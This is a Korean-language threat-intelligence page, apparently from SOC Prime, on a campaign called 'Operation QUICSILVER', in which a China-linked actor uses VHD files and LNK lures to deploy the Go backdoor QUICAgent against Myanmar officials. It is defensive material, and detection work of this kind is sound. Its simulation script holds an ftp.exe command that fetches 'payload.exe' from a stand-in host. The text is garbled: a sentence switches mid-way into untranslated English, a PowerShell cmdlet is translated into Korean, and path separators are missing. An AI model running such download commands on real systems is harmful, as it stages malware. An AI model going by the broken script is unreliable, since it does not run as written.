SOC Prime Bias: High

18 Aug 2026 06:27 UTC

중국 계열 행위자, VHD 파일을 사용하여 미얀마 외교관을 표적으로 삼다

Author Photo
SOC Prime Team linkedin icon 팔로우
중국 계열 행위자, VHD 파일을 사용하여 미얀마 외교관을 표적으로 삼다
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

중국 관련 위협 행위자가 버추얼 하드 디스크(VHD) 파일을 통해 다단계 감염 체인을 미얀마 정부 관계자를 대상으로 하고 있습니다. 이 캠페인은 악의적인 LNK 파일을 사용하여 ftp.exe 의 페이로드 재구성에 악용하고 QUICAgent라는 Go 기반 백도어를 배포합니다. 이 악성코드는 Cloudflare Workers를 사용하여 동적 C2 해결을 지원하고 QUIC 프로토콜을 통해 통신합니다.

조사

Seqrite APT 팀은 미끼 문서를 포함한 VHD 샘플을 분석하고 PDF 파일로 위장한 악성 LNK 파일을 확인했습니다. 조사를 통해 두 파일이 결합되어 copy 명령어로 실행 파일이 재구성되는 스플릿 페이로드 기술이 밝혀졌습니다. QUICAgent 임플란트의 기술 분석에서는 반복된 SHA-256 해싱 및 커스텀 TLS 인증서 검증을 통한 샌드박스 회피도 밝혀졌습니다.

완화

조직은 신뢰할 수 없는 LNK 파일의 실행을 제한하고 관련 ftp.exe을 포함한 수상한 자식 프로세스를 모니터링해야 합니다. VHD 사용에 대한 엄격한 제어와 UDP 포트 443을 통한 비정상적인 네트워크 트래픽 모니터링을 권장합니다. 잘 알려진 악성 Cloudflare Worker 엔드포인트 차단은 캠페인의 C2 해결 메커니즘을 방해할 수 있습니다.

대응

QUICSILVER 활동이 감지될 경우, 피해 시스템은 즉시 격리되어 추가 데이터 유출 및 C2 통신을 차단해야 합니다. 조사자는 %LOCALAPPDATA%Windowsupdate.exe 바이너리를 검토하고 사용자의 시작 폴더에서 SystemIn.lnk을 찾아봐야 합니다. 네트워크 로그도 분석하여 알려진 C2 도메인 및 IP 주소에 대한 연결을 확인하고 타격 범위를 파악해야 합니다.

공격 흐름

이 부분을 계속 업데이트 중입니다.

탐지

이중 확장자를 가진 가능성 있는 악성 LNK 파일 (cmdline 통해)

SOC Prime 팀
2026년 8월 17일

이중 확장자를 가진 가능성 있는 악성 파일 (process_creation 통해)

SOC Prime 팀
2026년 8월 17일

비정상적인 폴더에서 수행된 가능성 있는 수동 또는 스크립팅 작업 (cmdline 통해)

SOC Prime 팀
2026년 8월 17일

LOLBAS ftp (cmdline 통해)

SOC Prime 팀
2026년 8월 17일

자동 시작 위치에 있는 수상한 바이너리 / 스크립트 (file_event 통해)

SOC Prime 팀
2026년 8월 17일

마운트된 드라이브에서의 수상한 실행 (audit 통해)

SOC Prime 팀
2026년 8월 17일

가능성 있는 Cloudflare 개발 도메인 악용 (dns 통해)

SOC Prime 팀
2026년 8월 17일

탐지해야 할 IOC (HashSha256): Operation QUICSILVER: 중국 관련 행위자가 VHD로 전달된 Go 백도어를 통해 미얀마 외교관을 대상으로 함

SOC Prime AI 규칙
2026년 8월 17일

탐지해야 할 IOC (SourceIP): Operation QUICSILVER: 중국 관련 행위자가 VHD로 전달된 Go 백도어를 통해 미얀마 외교관을 대상으로 함

SOC Prime AI 규칙
2026년 8월 17일

탐지해야 할 IOC (DestinationIP): Operation QUICSILVER: 중국 관련 행위자가 VHD로 전달된 Go 백도어를 통해 미얀마 외교관을 대상으로 함

SOC Prime AI 규칙
2026년 8월 17일

QUICAgent C2 통신 탐지 [Windows 네트워크 연결]

SOC Prime AI 규칙
2026년 8월 17일

ftp.exe와 Windowsupdate.exe의 악성 실행을 위한 수상한 사용 [Windows 프로세스 생성]

SOC Prime AI 규칙
2026년 8월 17일

시뮬레이션 실행

전제 조건: 원격 측정 및 기준 사전 점검을 통과했어야 합니다.

이유: 이 섹션은 탐지 규칙을 트리거하도록 설계된 적의 기술(TTP)의 정확한 실행을 자세히 설명합니다. 명령과 서술은 반드시 식별된 TTP를 직접 반영하고 탐지 로직에 의해 예상되는 정확한 원격 측정을 생성해야 합니다. 추상적이거나 관련 없는 예시는 오진으로 이어질 것입니다.

  • 공격 서사 및 명령: 적은 합법적인 시스템 프로세스를 모방하여 발판을 마련하려고 합니다. 먼저, 스크립트 파일( ftp.exe )과 함께 사용하여 악의적인 페이로드를 다운로드, 자동화된 관리자 작업과 섞이려고 시도합니다. 동시에 “윈도우 업데이트” 바이너리(이름 변경) 배포를 시뮬레이션하여 페이로드 실행을 감춥니다. 마지막으로 사용자 상호작용을 통해 지속성을 확보하기 위해 악의적인-s:) to download a malicious payload, attempting to blend in with automated administrative tasks. Simultaneously, they simulate the deployment of a “Windows Update” binary (renamed) to mask the execution of the payload. Finally, they use a PowerShell script designed to create a malicious .lnk 파일을 생성하도록 설계된 PowerShell 스크립트를 사용합니다.

  • 회귀 테스트 스크립트:

    # 1. FTP 스크립트 기반 다운로드 시뮬레이션 (트리거 1 부분 A)
    $ftpScript = "open ftp.example.com`nuser anonymous anonymous`nget payload.exe`nquit"
    $ftpScript | Out-File -FilePath "$env:TEMPftp_script.txt" -Encoding ASCII
    시작-프로세스 "ftp.exe" -ArgumentList "-s:$env:TEMPftp_script.txt" -Wait
    
    # 2. Windowsupdate.exe 실행 시뮬레이션 (트리거 1 부분 B)
    # 참고: 이름이 Windowsupdate.exe인 파일이 존재하거나 호출되었다고 가정합니다
    # 시뮬레이션을 위해, 더미 파일을 생성하고 실행할 것입니다
    New-Item -Path "$env:TEMPWindowsupdate.exe" -ItemType File -Force
    시작-프로세스 "$env:TEMPWindowsupdate.exe"
    
    # 3. PowerShell LNK 생성 시뮬레이션 (트리거 2)
    시작-프로세스 "powershell.exe" -ArgumentList "-Command", "Write-Output 'create_lnk_process_running'"
  • 정리 명령:

    # 시뮬레이션된 아티팩트 제거
    Remove-Item -Path "$env:TEMPftp_script.txt" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPWindowsupdate.exe" -ErrorAction SilentlyContinue